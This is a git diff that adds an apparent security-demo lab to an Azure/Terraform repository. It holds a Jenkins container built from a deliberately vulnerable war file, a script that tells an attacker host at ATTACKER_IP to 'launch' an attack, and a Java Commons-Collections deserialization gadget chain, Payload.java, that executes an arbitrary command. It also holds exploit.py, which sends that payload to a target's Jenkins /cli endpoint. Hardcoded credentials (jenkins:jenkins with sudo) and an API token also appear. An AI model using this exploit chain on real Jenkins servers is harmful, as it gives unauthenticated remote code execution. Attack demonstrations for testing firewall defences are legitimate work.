+        az_cli(delete_rg_cmd)
+    #
+    # Delete state files WebInDeploy
+    #
+    delete_state_files('./WebInDeploy/', tfstate_files)
+
+
+    fpath = './WebInBootstrap/' + tfstate_file
+    if os.path.isfile(fpath):
+        delete_rg_cmd = 'group delete --name ' + rg_name1 + ' --yes'
+        az_cli(delete_rg_cmd)
+    #
+    # Delete state files WebInBootstrap
+    #
+    delete_state_files('./WebInBootstrap/', tfstate_files)
+
+
+    #
+    # Delete state files WebInFWConf
+    #
+    delete_state_files('./WebInFWConf/', tfstate_files)
+
+
+
+
+if __name__ == '__main__':
+    parser = argparse.ArgumentParser(description='Get Terraform Params')
+    parser.add_argument('-u', '--username', help='Firewall Username', required=True)
+    parser.add_argument('-p', '--password', help='Firewall Password', required=True)
+    args = parser.parse_args()
+    username = args.username
+    password = args.password
+    # get_default_cli().invoke(['login', "--use-device-code"], out_file=sys.stdout)
+    main(username, password)
diff --git a/azure/Jenkins_proj-working/jenkins/Dockerfile b/azure/Jenkins_proj-working/jenkins/Dockerfile
new file mode 100644
index 00000000..1dea80e9
--- /dev/null
+++ b/azure/Jenkins_proj-working/jenkins/Dockerfile
@@ -0,0 +1,38 @@
+FROM openjdk:8-jdk
+
+MAINTAINER jamie-b
+
+RUN apt-get update && apt-get install -y git curl wget netcat nmap net-tools sudo && rm -rf /var/lib/apt/lists/*
+
+
+ENV JENKINS_HOME /var/jenkins_home
+ENV COPY_REFERENCE_FILE_LOG $JENKINS_HOME/copy_reference_file.log
+
+RUN groupadd -g 1000 jenkins \
+    && useradd -d "$JENKINS_HOME" -u 1000 -g 1000 -m -s /bin/bash jenkins \
+    && adduser jenkins sudo \
+    && echo 'jenkins:jenkins' | chpasswd
+    
+ENV TINI_VERSION v0.14.0
+ADD https://github.com/wwce/terraform/blob/master/azure/Jenkins_proj-master/jenkins/tini?raw=true /bin/tini
+RUN chmod +x /bin/tini
+
+ENV JENKINS_VERSION 2.32.1
+RUN set -ex \
+    && [ -e /usr/share/jenkins ] || mkdir -p /usr/share/jenkins \
+    && [ -e /usr/share/jenkins/ref ] || mkdir -p /usr/share/jenkins/ref \
+    && wget https://s3.amazonaws.com/jenkinsploit/jenkins-2-32.war -O /usr/share/jenkins/jenkins.war -q --progress=bar:force:noscroll --show-progress \
+    && chown -R jenkins "$JENKINS_HOME" /usr/share/jenkins/ref
+
+EXPOSE 8080
+EXPOSE 50000
+
+COPY jenkins.sh /usr/local/bin/jenkins.sh
+
+RUN chmod +x /usr/local/bin/jenkins.sh
+
+USER root
+
+ENTRYPOINT ["/bin/tini", "--"]
+
+CMD ["/usr/local/bin/jenkins.sh"]
diff --git a/azure/Jenkins_proj-working/jenkins/config.xml b/azure/Jenkins_proj-working/jenkins/config.xml
new file mode 100644
index 00000000..071c4fb7
--- /dev/null
+++ b/azure/Jenkins_proj-working/jenkins/config.xml
@@ -0,0 +1,35 @@
+<?xml version='1.0' encoding='UTF-8'?>
+<user>
+  <fullName>admin admin</fullName>
+  <properties>
+    <jenkins.security.ApiTokenProperty>
+      <apiToken>N2ooq1C0iCP+SERJA63imvGjKrB40ORk7hFGe9ItYuT0iVVj/0rJDQKpVBfS6PMq</apiToken>
+    </jenkins.security.ApiTokenProperty>
+    <hudson.model.MyViewsProperty>
+      <views>
+        <hudson.model.AllView>
+          <owner class="hudson.model.MyViewsProperty" reference="../../.."/>
+          <name>All</name>
+          <filterExecutors>false</filterExecutors>
+          <filterQueue>false</filterQueue>
+          <properties class="hudson.model.View$PropertyList"/>
+        </hudson.model.AllView>
+      </views>
+    </hudson.model.MyViewsProperty>
+    <org.jenkinsci.plugins.displayurlapi.user.PreferredProviderUserProperty plugin="display-url-api@2.2.0">
+      <providerId>default</providerId>
+    </org.jenkinsci.plugins.displayurlapi.user.PreferredProviderUserProperty>
+    <hudson.model.PaneStatusProperties>
+      <collapsed/>
+    </hudson.model.PaneStatusProperties>
+    <hudson.search.UserSearchProperty>
+      <insensitiveSearch>false</insensitiveSearch>
+    </hudson.search.UserSearchProperty>
+    <hudson.security.HudsonPrivateSecurityRealm_-Details>
+      <passwordHash>bcrypt:768e02f82c2e957c0aa638bbee6bcc49d5c7f1d8a67d1a838b0945ce144e6e46</passwordHash>
+    </hudson.security.HudsonPrivateSecurityRealm_-Details>
+    <hudson.tasks.Mailer_-UserProperty plugin="mailer@1.22">
+      <emailAddress>admin@admin.com</emailAddress>
+    </hudson.tasks.Mailer_-UserProperty>
+  </properties>
+</user>
diff --git a/azure/Jenkins_proj-working/jenkins/docker-compose.yml b/azure/Jenkins_proj-working/jenkins/docker-compose.yml
new file mode 100644
index 00000000..61334042
--- /dev/null
+++ b/azure/Jenkins_proj-working/jenkins/docker-compose.yml
@@ -0,0 +1,11 @@
+version: '3'
+services:
+  jenkins:
+    build: .
+    container_name: jenkins
+    environment:
+      JAVA_OPTS: "-Djava.awt.headless=true"
+      JAVA_OPTS: "-Djenkins.install.runSetupWizard=false"
+    ports:
+      - "50000:50000"
+      - "8080:8080"
diff --git a/azure/Jenkins_proj-working/jenkins/jenkins.sh b/azure/Jenkins_proj-working/jenkins/jenkins.sh
new file mode 100644
index 00000000..b44f6ba2
--- /dev/null
+++ b/azure/Jenkins_proj-working/jenkins/jenkins.sh
@@ -0,0 +1,24 @@
+#! /bin/bash -e
+
+: "${JENKINS_HOME:="/var/jenkins_home"}"
+touch "${COPY_REFERENCE_FILE_LOG}" || { echo "Can not write to ${COPY_REFERENCE_FILE_LOG}. Wrong volume permissions?"; exit 1; }
+echo "--- Copying files at $(date)" >> "$COPY_REFERENCE_FILE_LOG"
+
+# if `docker run` first argument start with `--` the user is passing jenkins launcher arguments
+if [[ $# -lt 1 ]] || [[ "$1" == "--"* ]]; then
+
+  # read JAVA_OPTS and JENKINS_OPTS into arrays
+  java_opts_array=()
+  while IFS= read -r -d '' item; do
+    java_opts_array+=( "$item" )
+  done < <([[ $JAVA_OPTS ]] && xargs printf '%s\0' <<<"$JAVA_OPTS")
+
+  jenkins_opts_array=( )
+  while IFS= read -r -d '' item; do
+    jenkins_opts_array+=( "$item" )
+  done < <([[ $JENKINS_OPTS ]] && xargs printf '%s\0' <<<"$JENKINS_OPTS")
+
+  exec java "${java_opts_array[@]}" -jar /usr/share/jenkins/jenkins.war "${jenkins_opts_array[@]}" "$@"
+fi
+
+exec "$@"
diff --git a/azure/Jenkins_proj-working/jenkins/tini b/azure/Jenkins_proj-working/jenkins/tini
new file mode 100644
index 00000000..4e5b36a9
Binary files /dev/null and b/azure/Jenkins_proj-working/jenkins/tini differ
diff --git a/azure/Jenkins_proj-working/launch_attack_vector.py b/azure/Jenkins_proj-working/launch_attack_vector.py
new file mode 100644
index 00000000..dce17b39
--- /dev/null
+++ b/azure/Jenkins_proj-working/launch_attack_vector.py
@@ -0,0 +1,72 @@
+#!/usr/bin/env python3
+
+import requests
+import argparse
+from python_terraform import Terraform
+import json
+import sys
+
+
+def get_terraform_outputs() -> dict:
+    tf = Terraform(working_dir='./WebInDeploy')
+    rc, out, err = tf.cmd('output', '-json')
+
+    if rc == 0:
+        try:
+            return json.loads(out)
+        except ValueError as ve:
+            print('Could not parse terraform outputs!')
+            return dict()
+
+
+def main(attack_vector: str) -> None:
+
+    print('Attempting to launch exploit...\n')
+    outputs = get_terraform_outputs()
+    print(outputs)
+    if attack_vector == 'native':
+        print('Using native waf protected attack vector...\n')
+        target = outputs['NATIVE-DNS']['value']
+    elif attack_vector == 'panos':
+        print('Using PAN-OS protected attack vector...\n')
+        target = outputs['ALB-DNS']['value']
+    else:
+        print('malformed outputs!')
+        target = '127.0.0.1'
+    if 'ATTACKER_IP' not in outputs:
+        print('No attacker ip found in tf outputs!')
+        sys.exit(1)
+
+    attacker = outputs['ATTACKER_IP']['value']
+    payload = dict()
+    payload['attacker'] = attacker
+    payload['target'] = target
+
+    headers = dict()
+    headers['Content-Type'] = 'application/json'
+    headers['Accept'] = '*/*'
+
+    try:
+        resp = requests.post(f'http://{attacker}:5000/launch', data=json.dumps(payload), headers=headers)
+        if resp.status_code == 200:
+            print('Exploit Successfully Launched!\n')
+            print(resp.text)
+            sys.exit(0)
+        else:
+            print('Could not Launch Exploit!\n')
+            print(resp.text)
+            sys.exit(0)
+    except ConnectionRefusedError as cre:
+        print('Could not connect to attacker instance!')
+        sys.exit(1)
+
+
+if __name__ == '__main__':
+    parser = argparse.ArgumentParser(description='Launch Jenkins Attack CnC')
+    parser.add_argument('-c', '--vector', help='Attack Vector', required=True)
+
+    args = parser.parse_args()
+    vector = args.vector
+
+    main(vector)
+
diff --git a/azure/Jenkins_proj-working/payload/Payload.java b/azure/Jenkins_proj-working/payload/Payload.java
new file mode 100644
index 00000000..cbd4c8b5
--- /dev/null
+++ b/azure/Jenkins_proj-working/payload/Payload.java
@@ -0,0 +1,189 @@
+import java.io.FileOutputStream;
+import java.io.ObjectOutputStream;
+import java.io.ObjectStreamException;
+import java.io.Serializable;
+import java.lang.reflect.Field;
+import java.security.KeyPair;
+import java.security.KeyPairGenerator;
+import java.security.PrivateKey;
+import java.security.PublicKey;
+import java.security.Signature;
+import java.security.SignedObject;
+import java.util.Comparator;
+import java.util.HashMap;
+import java.util.HashSet;
+import java.util.Map;
+import java.util.concurrent.ConcurrentSkipListSet;
+import java.util.concurrent.CopyOnWriteArraySet;
+ 
+import net.sf.json.JSONArray;
+ 
+import org.apache.commons.collections.Transformer;
+import org.apache.commons.collections.collection.AbstractCollectionDecorator;
+import org.apache.commons.collections.functors.ChainedTransformer;
+import org.apache.commons.collections.functors.ConstantTransformer;
+import org.apache.commons.collections.functors.InvokerTransformer;
+import org.apache.commons.collections.keyvalue.TiedMapEntry;
+import org.apache.commons.collections.map.LazyMap;
+import org.apache.commons.collections.map.ReferenceMap;
+import org.apache.commons.collections.set.ListOrderedSet;
+ 
+public class Payload implements Serializable {
+ 
+    private Serializable payload;
+ 
+    public Payload(String cmd) throws Exception {
+ 
+        this.payload = this.setup(cmd);
+ 
+    }
+ 
+    public Serializable setup(String cmd) throws Exception {
+        final String[] execArgs = new String[] { cmd };
+ 
+        final Transformer[] transformers = new Transformer[] {
+                new ConstantTransformer(Runtime.class),
+                new InvokerTransformer("getMethod", new Class[] { String.class,
+                        Class[].class }, new Object[] { "getRuntime",
+                        new Class[0] }),
+                new InvokerTransformer("invoke", new Class[] { Object.class,
+                        Object[].class }, new Object[] { null, new Object[0] }),
+                new InvokerTransformer("exec", new Class[] { String.class },
+                        execArgs), new ConstantTransformer(1) };
+ 
+        Transformer transformerChain = new ChainedTransformer(transformers);
+ 
+        final Map innerMap = new HashMap();
+ 
+        final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);
+ 
+        TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo");
+ 
+        HashSet map = new HashSet(1);
+        map.add("foo");
+        Field f = null;
+        try {
+            f = HashSet.class.getDeclaredField("map");
+        } catch (NoSuchFieldException e) {
+            f = HashSet.class.getDeclaredField("backingMap");
+        }
+ 
+        f.setAccessible(true);
+        HashMap innimpl = (HashMap) f.get(map);
+ 
+        Field f2 = null;
+        try {
+            f2 = HashMap.class.getDeclaredField("table");
+        } catch (NoSuchFieldException e) {
+            f2 = HashMap.class.getDeclaredField("elementData");
+        }
+ 
+        f2.setAccessible(true);
+        Object[] array2 = (Object[]) f2.get(innimpl);
+ 
+        Object node = array2[0];
+        if (node == null) {
+            node = array2[1];
+        }
+ 
+        Field keyField = null;
+        try {
+            keyField = node.getClass().getDeclaredField("key");
+        } catch (Exception e) {
+            keyField = Class.forName("java.util.MapEntry").getDeclaredField(
+                    "key");
+        }
+ 
+        keyField.setAccessible(true);
+        keyField.set(node, entry);
+ 
+        KeyPairGenerator keyPairGenerator = KeyPairGenerator.getInstance("DSA");
+        keyPairGenerator.initialize(1024);
+        KeyPair keyPair = keyPairGenerator.genKeyPair();
+        PrivateKey privateKey = keyPair.getPrivate();
+        PublicKey publicKey = keyPair.getPublic();
+ 
+        Signature signature = Signature.getInstance(privateKey.getAlgorithm());
+        SignedObject payload = new SignedObject(map, privateKey, signature);
+        JSONArray array = new JSONArray();
+ 
+        array.add("asdf");
+ 
+        ListOrderedSet set = new ListOrderedSet();
+        Field f1 = AbstractCollectionDecorator.class
+                .getDeclaredField("collection");
+        f1.setAccessible(true);
+        f1.set(set, array);
+ 
+        DummyComperator comp = new DummyComperator();
+        ConcurrentSkipListSet csls = new ConcurrentSkipListSet(comp);
+        csls.add(payload);
+ 
+        CopyOnWriteArraySet a1 = new CopyOnWriteArraySet();
+        CopyOnWriteArraySet a2 = new CopyOnWriteArraySet();
+ 
+        a1.add(set);
+        Container c = new Container(csls);
+        a1.add(c);
+ 
+        a2.add(csls);
+        a2.add(set);
+ 
+        ReferenceMap flat3map = new ReferenceMap();
+        flat3map.put(new Container(a1), "asdf");
+        flat3map.put(new Container(a2), "asdf");
+ 
+        return flat3map;
+    }
+ 
+    private Object writeReplace() throws ObjectStreamException {
+        return this.payload;
+    }
+ 
+    static class Container implements Serializable {
+ 
+        private Object o;
+ 
+        public Container(Object o) {
+            this.o = o;
+        }
+ 
+        private Object writeReplace() throws ObjectStreamException {
+            return o;
+        }
+ 
+    }
+ 
+    static class DummyComperator implements Comparator, Serializable {
+ 
+        public int compare(Object arg0, Object arg1) {
+            // TODO Auto-generated method stub
+            return 0;
+        }
+ 
+        private Object writeReplace() throws ObjectStreamException {
+            return null;
+        }
+ 
+    }
+ 
+    public static void main(String args[]) throws Exception{
+ 
+        if(args.length != 2){
+            System.out.println("java -jar payload.jar outfile cmd");
+            System.exit(0);
+        }
+ 
+        String cmd = args[1];
+        FileOutputStream out = new FileOutputStream(args[0]);
+ 
+        Payload pwn = new Payload(cmd);
+        ObjectOutputStream oos = new ObjectOutputStream(out);
+        oos.writeObject(pwn);
+        oos.flush();
+        out.flush();
+ 
+ 
+    }
+ 
+}
\ No newline at end of file
diff --git a/azure/Jenkins_proj-working/payload/commons-beanutils-1.8.3.jar b/azure/Jenkins_proj-working/payload/commons-beanutils-1.8.3.jar
new file mode 100644
index 00000000..218510bc
Binary files /dev/null and b/azure/Jenkins_proj-working/payload/commons-beanutils-1.8.3.jar differ
diff --git a/azure/Jenkins_proj-working/payload/commons-collections-3.2.1.jar b/azure/Jenkins_proj-working/payload/commons-collections-3.2.1.jar
new file mode 100644
index 00000000..c35fa1fe
Binary files /dev/null and b/azure/Jenkins_proj-working/payload/commons-collections-3.2.1.jar differ
diff --git a/azure/Jenkins_proj-working/payload/commons-lang-2.6.jar b/azure/Jenkins_proj-working/payload/commons-lang-2.6.jar
new file mode 100644
index 00000000..98467d3a
Binary files /dev/null and b/azure/Jenkins_proj-working/payload/commons-lang-2.6.jar differ
diff --git a/azure/Jenkins_proj-working/payload/commons-logging-1.2.jar b/azure/Jenkins_proj-working/payload/commons-logging-1.2.jar
new file mode 100644
index 00000000..93a3b9f6
Binary files /dev/null and b/azure/Jenkins_proj-working/payload/commons-logging-1.2.jar differ
diff --git a/azure/Jenkins_proj-working/payload/exploit.py b/azure/Jenkins_proj-working/payload/exploit.py
new file mode 100644
index 00000000..89c789d4
--- /dev/null
+++ b/azure/Jenkins_proj-working/payload/exploit.py
@@ -0,0 +1,92 @@
+import urllib
+import requests
+import uuid
+import threading
+import time
+import gzip
+import urllib3
+import zlib
+import subprocess
+ 
+proxies = {
+#  'http': 'http://127.0.0.1:8085',
+#  'https': 'http://127.0.0.1:8090',
+}
+
+TARGET = input("Enter Jenkins Target IP Address: ")
+URL='http://' + TARGET + ':80/cli'
+ 
+PREAMBLE = b'<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAH4='
+PROTO = b'\x00\x00\x00\x00'
+ 
+ 
+FILE_SER = open("payload.ser", "rb").read()
+ 
+def download(url, session):
+ 
+    headers = {'Side' : 'download'}
+    #headers['Content-type'] = 'application/x-www-form-urlencoded'
+    headers['User-Agent'] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'
+    headers['X-CSRF-Token'] = 'DEADC0DEDEADBEEFCAFEBABEDABBAD00DBB0'
+    headers['Session'] = session
+    headers['Transfer-Encoding'] = 'chunked'
+    r = requests.post(url, data=null_payload(),headers=headers, proxies=proxies, stream=True)
+    print(r.content)
+ 
+ 
+def upload(url, session, data):
+ 
+    headers = {'Side' : 'upload'}
+    headers['Session'] = session
+    #headers['Content-type'] = 'application/octet-stream'
+    headers['User-Agent'] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'
+    #headers['Content-Length'] = '335'
+    headers['X-CSRF-Token'] = 'DEADC0DEDEADBEEFCAFEBABEDABBAD00DBB0'
+    headers['Accept-Encoding'] = None
+    r = requests.post(url,data=data,headers=headers,proxies=proxies)
+ 
+ 
+def upload_chunked(url,session, data):
+ 
+    headers = {'Side' : 'upload'}
+    headers['Session'] = session
+    #headers['Content-type'] = 'application/octet-stream'
+    headers['User-Agent'] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'
+    #headers['Content-Length'] = '335'
+    headers['X-CSRF-Token'] = 'DEADC0DEDEADBEEFCAFEBABEDABBAD00DBB0'
+    headers['Accept-Encoding']= None
+    headers['Transfer-Encoding'] = 'chunked'
+    headers['Cache-Control'] = 'no-cache'
+ 
+    r = requests.post(url, headers=headers, data=create_payload_chunked(), proxies=proxies)
+ 
+ 
+def null_payload():
+    yield b" "
+ 
+def create_payload():
+    payload = PREAMBLE + PROTO + FILE_SER
+ 
+    return payload
+ 
+def create_payload_chunked():
+    yield PREAMBLE
+    yield PROTO
+    yield FILE_SER
+ 
+def main():
+    print("start")
+ 
+    session = str(uuid.uuid4())
+ 
+    t = threading.Thread(target=download, args=(URL, session))
+    t.start()
+ 
+    time.sleep(1)
+    print("pwn")
+    #upload(URL, session, create_payload())
+ 
+    upload_chunked(URL, session, "asdf")
+ 
+if __name__ == "__main__":
+    main()
diff --git a/azure/Jenkins_proj-working/payload/ezmorph-1.0.6.jar b/azure/Jenkins_proj-working/payload/ezmorph-1.0.6.jar
new file mode 100644
index 00000000..30fad12d
Binary files /dev/null and b/azure/Jenkins_proj-working/payload/ezmorph-1.0.6.jar differ
diff --git a/azure/Jenkins_proj-working/payload/json-lib-2.4-jenkins-2.jar b/azure/Jenkins_proj-working/payload/json-lib-2.4-jenkins-2.jar
new file mode 100644
index 00000000..a47f128a
Binary files /dev/null and b/azure/Jenkins_proj-working/payload/json-lib-2.4-jenkins-2.jar differ
diff --git a/azure/Jenkins_proj-working/payload/payload.jar b/azure/Jenkins_proj-working/payload/payload.jar
new file mode 100644
index 00000000..51e0bcc9
Binary files /dev/null and b/azure/Jenkins_proj-working/payload/payload.jar differ
diff --git a/azure/Jenkins_proj-working/requirements.txt b/azure/Jenkins_proj-working/requirements.txt
new file mode 100644
index 00000000..c36b3a97
--- /dev/null
+++ b/azure/Jenkins_proj-working/requirements.txt
@@ -0,0 +1,227 @@
+adal==1.2.1
+amqp==2.4.2
+antlr4-python3-runtime==4.7.2
+applicationinsights==0.11.7
+argcomplete==1.9.5
+asgiref==3.0.0
+asn1crypto==0.24.0
+async-timeout==3.0.1
+atomicwrites==1.3.0
+attrs==19.1.0
+autobahn==19.3.3
+Automat==0.7.0
+azure-batch==6.0.0
+azure-cli==2.0.63
+azure-cli-acr==2.2.5
+azure-cli-acs==2.3.22
+azure-cli-advisor==2.0.0
+azure-cli-ams==0.4.5
+azure-cli-appservice==0.2.18
+azure-cli-backup==1.2.4
+azure-cli-batch==4.0.0
+azure-cli-batchai==0.4.8
+azure-cli-billing==0.2.1
+azure-cli-botservice==0.1.10
+azure-cli-cdn==0.2.3
+azure-cli-cloud==2.1.1
+azure-cli-cognitiveservices==0.2.5
+azure-cli-command-modules-nspkg==2.0.2
+azure-cli-configure==2.0.22
+azure-cli-consumption==0.4.2
+azure-cli-container==0.3.16
+azure-cli-core==2.0.63
+azure-cli-cosmosdb==0.2.10
+azure-cli-deploymentmanager==0.1.0
+azure-cli-dla==0.2.5
+azure-cli-dls==0.1.9
+azure-cli-dms==0.1.3
+azure-cli-eventgrid==0.2.3
+azure-cli-eventhubs==0.3.4
+azure-cli-extension==0.2.5
+azure-cli-feedback==2.2.1
+azure-cli-find==0.3.2
+azure-cli-hdinsight==0.3.3
+azure-cli-interactive==0.4.3
+azure-cli-iot==0.3.8
+azure-cli-iotcentral==0.1.6
+azure-cli-keyvault==2.2.14
+azure-cli-kusto==0.2.2
+azure-cli-lab==0.1.7
+azure-cli-maps==0.3.4
+azure-cli-monitor==0.2.13
+azure-cli-network==2.3.7
+azure-cli-nspkg==3.0.3
+azure-cli-policyinsights==0.1.2
+azure-cli-privatedns==1.0.0
+azure-cli-profile==2.1.5
+azure-cli-rdbms==0.3.10
+azure-cli-redis==0.4.2
+azure-cli-relay==0.1.4
+azure-cli-reservations==0.4.2
+azure-cli-resource==2.1.14
+azure-cli-role==2.6.0
+azure-cli-search==0.1.1
+azure-cli-security==0.1.1
+azure-cli-servicebus==0.3.4
+azure-cli-servicefabric==0.1.17
+azure-cli-signalr==1.0.0
+azure-cli-sql==2.2.2
+azure-cli-sqlvm==0.1.1
+azure-cli-storage==2.4.1
+azure-cli-telemetry==1.0.2
+azure-cli-vm==2.2.19
+azure-common==1.1.20
+azure-datalake-store==0.0.39
+azure-functions-devops-build==0.0.21
+azure-graphrbac==0.60.0
+azure-keyvault==1.1.0
+azure-mgmt-advisor==2.0.1
+azure-mgmt-applicationinsights==0.1.1
+azure-mgmt-authorization==0.50.0
+azure-mgmt-batch==6.0.0
+azure-mgmt-batchai==2.0.0
+azure-mgmt-billing==0.2.0
+azure-mgmt-botservice==0.1.0
+azure-mgmt-cdn==3.1.0
+azure-mgmt-cognitiveservices==3.0.0
+azure-mgmt-compute==4.6.1
+azure-mgmt-consumption==2.0.0
+azure-mgmt-containerinstance==1.4.0
+azure-mgmt-containerregistry==2.7.0
+azure-mgmt-containerservice==4.4.0
+azure-mgmt-cosmosdb==0.5.2
+azure-mgmt-datalake-analytics==0.2.1
+azure-mgmt-datalake-nspkg==3.0.1
+azure-mgmt-datalake-store==0.5.0
+azure-mgmt-datamigration==0.1.0
+azure-mgmt-deploymentmanager==0.1.0
+azure-mgmt-devtestlabs==2.2.0
+azure-mgmt-dns==2.1.0
+azure-mgmt-eventgrid==2.0.0
+azure-mgmt-eventhub==2.3.0
+azure-mgmt-hdinsight==0.2.1
+azure-mgmt-iotcentral==1.0.0
+azure-mgmt-iothub==0.7.0
+azure-mgmt-iothubprovisioningservices==0.2.0
+azure-mgmt-keyvault==1.1.0
+azure-mgmt-kusto==0.3.0
+azure-mgmt-loganalytics==0.2.0
+azure-mgmt-managementgroups==0.1.0
+azure-mgmt-maps==0.1.0
+azure-mgmt-marketplaceordering==0.1.0
+azure-mgmt-media==1.1.1
+azure-mgmt-monitor==0.5.2
+azure-mgmt-msi==0.2.0
+azure-mgmt-network==2.6.0
+azure-mgmt-nspkg==3.0.2
+azure-mgmt-policyinsights==0.2.0
+azure-mgmt-privatedns==0.1.0
+azure-mgmt-rdbms==1.7.1
+azure-mgmt-recoveryservices==0.1.1
+azure-mgmt-recoveryservicesbackup==0.1.2
+azure-mgmt-redis==6.0.0
+azure-mgmt-relay==0.1.0
+azure-mgmt-reservations==0.3.1
+azure-mgmt-resource==2.1.0
+azure-mgmt-search==2.0.0
+azure-mgmt-security==0.1.0
+azure-mgmt-servicebus==0.5.3
+azure-mgmt-servicefabric==0.2.0
+azure-mgmt-signalr==0.1.1
+azure-mgmt-sql==0.12.0
+azure-mgmt-sqlvirtualmachine==0.2.0
+azure-mgmt-storage==3.1.1
+azure-mgmt-trafficmanager==0.51.0
+azure-mgmt-web==0.41.0
+azure-multiapi-storage==0.2.3
+azure-nspkg==3.0.2
+azure-storage==0.36.0
+azure-storage-blob==1.3.1
+azure-storage-common==1.4.0
+azure-storage-file==1.4.0
+azure-storage-nspkg==3.1.0
+bcrypt==3.1.6
+billiard==3.6.0.0
+celery==4.3.0
+certifi==2019.3.9
+cffi==1.12.3
+chardet==3.0.4
+collections2==0.3.0
+colorama==0.4.1
+constantly==15.1.0
+cryptography==2.4.2
+decorator==4.4.0
+Django==2.2.4
+django-widget-tweaks==1.4.3
+docker==3.7.2
+docker-pycreds==0.4.0
+fabric==2.4.0
+gitdb2==2.0.5
+GitPython==2.1.11
+gunicorn==19.9.0
+humanfriendly==4.18
+hyperlink==18.0.0
+idna==2.8
+incremental==17.5.0
+invoke==1.2.0
+ipaddress==1.0.22
+isodate==0.6.0
+Jinja2==2.10.1
+jmespath==0.9.4
+jsonpath-ng==1.4.3
+knack==0.5.4
+kombu==4.5.0
+MarkupSafe==1.1.1
+mock==2.0.0
+more-itertools==7.0.0
+msrest==0.6.6
+msrestazure==0.6.0
+oauthlib==3.0.1
+oyaml==0.9
+pan-python==0.14.0
+pandevice==0.6.6
+paramiko==2.4.2
+passlib==1.7.1
+pbr==5.2.0
+pluggy==0.9.0
+ply==3.11
+portalocker==1.2.1
+prompt-toolkit==1.0.15
+psutil==5.6.6
+py==1.8.0
+pyAesCrypt==0.4.2
+pyasn1==0.4.5
+pycparser==2.19
+pydocumentdb==2.3.3
+Pygments==2.3.1
+PyHamcrest==1.9.0
+PyJWT==1.7.1
+PyNaCl==1.3.0
+pyOpenSSL==19.0.0
+pyperclip==1.7.0
+pytest==4.4.0
+pytest-django==3.4.8
+python-dateutil==2.8.0
+python-terraform==0.10.0
+pytz==2019.1
+PyYAML==5.1
+requests==2.21.0
+requests-oauthlib==1.2.0
+scp==0.13.2
+six==1.12.0
+smmap2==2.0.5
+sqlparse==0.3.0
+sshtunnel==0.1.4
+tabulate==0.8.3
+Twisted==18.9.0
+txaio==18.8.1
+urllib3==1.24.2
+vine==1.3.0
+virtualenv==16.4.3
+virtualenv-clone==0.5.2
+vsts==0.1.25
+vsts-cd-manager==1.0.2
+wcwidth==0.1.7
+websocket-client==0.56.0
+xmltodict==0.12.0
+zope.interface==4.6.0
diff --git a/azure/Jenkins_proj-working/requirementsold2.txt b/azure/Jenkins_proj-working/requirementsold2.txt
new file mode 100644
index 00000000..68742357
--- /dev/null
+++ b/azure/Jenkins_proj-working/requirementsold2.txt
@@ -0,0 +1,222 @@
+adal==1.2.1
+amqp==2.4.2
+antlr4-python3-runtime==4.7.2
+applicationinsights==0.11.8
+argcomplete==1.9.5
+asgiref==3.0.0
+asn1crypto==0.24.0
+async-timeout==3.0.1
+atomicwrites==1.3.0
+attrs==19.1.0
+autobahn==19.3.3
+Automat==0.7.0
+azure-batch==6.0.0
+azure-cli==2.0.63
+azure-cli-acr==2.2.5
+azure-cli-acs==2.3.22
+azure-cli-advisor==2.0.0
+azure-cli-ams==0.4.5
+azure-cli-appservice==0.2.18
+azure-cli-backup==1.2.4
+azure-cli-batch==4.0.0
+azure-cli-batchai==0.4.8
+azure-cli-billing==0.2.1
+azure-cli-botservice==0.1.10
+azure-cli-cdn==0.2.3
+azure-cli-cloud==2.1.1
+azure-cli-cognitiveservices==0.2.5
+azure-cli-command-modules-nspkg==2.0.2
+azure-cli-configure==2.0.22
+azure-cli-consumption==0.4.2
+azure-cli-container==0.3.16
+azure-cli-core==2.0.63
+azure-cli-cosmosdb==0.2.10
+azure-cli-deploymentmanager==0.1.0
+azure-cli-dla==0.2.5
+azure-cli-dls==0.1.9
+azure-cli-dms==0.1.3
+azure-cli-eventgrid==0.2.3
+azure-cli-eventhubs==0.3.4
+azure-cli-extension==0.2.5
+azure-cli-feedback==2.2.1
+azure-cli-find==0.3.2
+azure-cli-hdinsight==0.3.3
+azure-cli-interactive==0.4.3
+azure-cli-iot==0.3.8
+azure-cli-iotcentral==0.1.6
+azure-cli-keyvault==2.2.14
+azure-cli-kusto==0.2.2
+azure-cli-lab==0.1.7
+azure-cli-maps==0.3.4
+azure-cli-monitor==0.2.13
+azure-cli-network==2.3.7
+azure-cli-nspkg==3.0.3
+azure-cli-policyinsights==0.1.2
+azure-cli-privatedns==1.0.0
+azure-cli-profile==2.1.5
+azure-cli-rdbms==0.3.10
+azure-cli-redis==0.4.2
+azure-cli-relay==0.1.4
+azure-cli-reservations==0.4.2
+azure-cli-resource==2.1.14
+azure-cli-role==2.6.0
+azure-cli-search==0.1.1
+azure-cli-security==0.1.1
+azure-cli-servicebus==0.3.4
+azure-cli-servicefabric==0.1.17
+azure-cli-signalr==1.0.0
+azure-cli-sql==2.2.2
+azure-cli-sqlvm==0.1.1
+azure-cli-storage==2.4.1
+azure-cli-telemetry==1.0.2
+azure-cli-vm==2.2.19
+azure-common==1.1.20
+azure-datalake-store==0.0.39
+azure-functions-devops-build==0.0.21
+azure-graphrbac==0.60.0
+azure-keyvault==1.1.0
+azure-mgmt-advisor==2.0.1
+azure-mgmt-applicationinsights==0.1.1
+azure-mgmt-authorization==0.50.0
+azure-mgmt-batch==6.0.0
+azure-mgmt-batchai==2.0.0
+azure-mgmt-billing==0.2.0
+azure-mgmt-botservice==0.1.0
+azure-mgmt-cdn==3.1.0
+azure-mgmt-cognitiveservices==3.0.0
+azure-mgmt-compute==4.6.1
+azure-mgmt-consumption==2.0.0
+azure-mgmt-containerinstance==1.4.0
+azure-mgmt-containerregistry==2.7.0
+azure-mgmt-containerservice==4.4.0
+azure-mgmt-cosmosdb==0.5.2
+azure-mgmt-datalake-analytics==0.2.1
